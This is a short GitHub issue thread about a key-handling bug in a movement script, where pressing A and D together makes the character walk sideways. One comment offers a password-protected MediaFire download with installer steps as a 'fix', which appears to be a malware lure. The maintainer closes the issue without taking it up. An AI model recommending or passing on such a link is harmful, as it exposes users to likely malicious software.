### ISSUE TITLE
When A and D are pressed at the same time, one of the buttons lights up

### ISSUE THREAD

**Issue by N1zyx3** [Qiasfah/Null-Movement-Script#14]
Just press these keys at the same time, and the character starts walking sideways without you pinching depending on the 2nd key

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Qiasfah** [comment]
closing, please provide a repo with a suggested fix if you want to help.
